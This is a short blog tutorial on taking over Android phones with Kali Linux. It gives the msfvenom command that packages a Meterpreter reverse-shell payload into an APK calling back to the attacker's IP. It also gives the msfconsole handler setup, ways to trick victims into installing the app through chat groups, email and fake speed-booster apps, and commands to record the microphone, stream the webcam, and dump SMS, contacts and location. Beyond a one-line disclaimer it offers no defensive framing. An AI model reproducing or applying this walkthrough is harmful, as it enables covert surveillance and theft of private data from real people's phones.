Tutorial: Hacking Androids with KALI

Hacking Android with KALI Linux
Hacking Android with KALI Linux

Hacking an Android device is quite easy. All you need is KALI Linux and these instructions to hack ANY Android no matter of it’s Android version. This tutorial has been made for demonstration purposes only.

Social Engineering Required

To hack an Android device you must convince the user to install an App you created. Be imaginative on how to distribute this app. Here are some simple samples:

  • Promote the App on a Social Network
  • Promote the App on WhatApp Chat Groups (heavily used!)
  • Promote the App on a Website (Surf Speed Accelerator…)
  • Send the App by E-Mail (works…)
  • Inject the App by intercepting the user’s WiFi-Connection (Very advanced stuff…)

How to create the malicious App

Thats quite easy. All you need is this command, which runs out of the box with KALI Linux:

msfvenom -p android/meterpreter/reverse_tcp  LHOST=YOUR_IP_ADDRESS LPORT=YOUR_METASPLOIT_PORT R > android.apk

A couple of seconds later, “android.apk” is created. Once this App is “installed” on a victims device, it will try to make a Meterpreter Reverse Connection to YOUR_IP_ADDRESS:YOUR_METASPLOIT_PORT. For example: Replace the values with your external IP-Address and port.

Get Ready to Intercept the Victim

In the next step you need to prepare your attacking device. We are using MSFConsole for demonstration purposes. Here’s the code:

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Waiting for the victim…

Once you did this setup, you are done. When the victim recieves the App, a reverse Meterpreter Session is spawned to your attack system and the victims android is under your control. Some useful commands you can run include:

  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_sms
  • dump_contacts
  • geolocate


Be the first to comment

Leave a Reply

Your email address will not be published.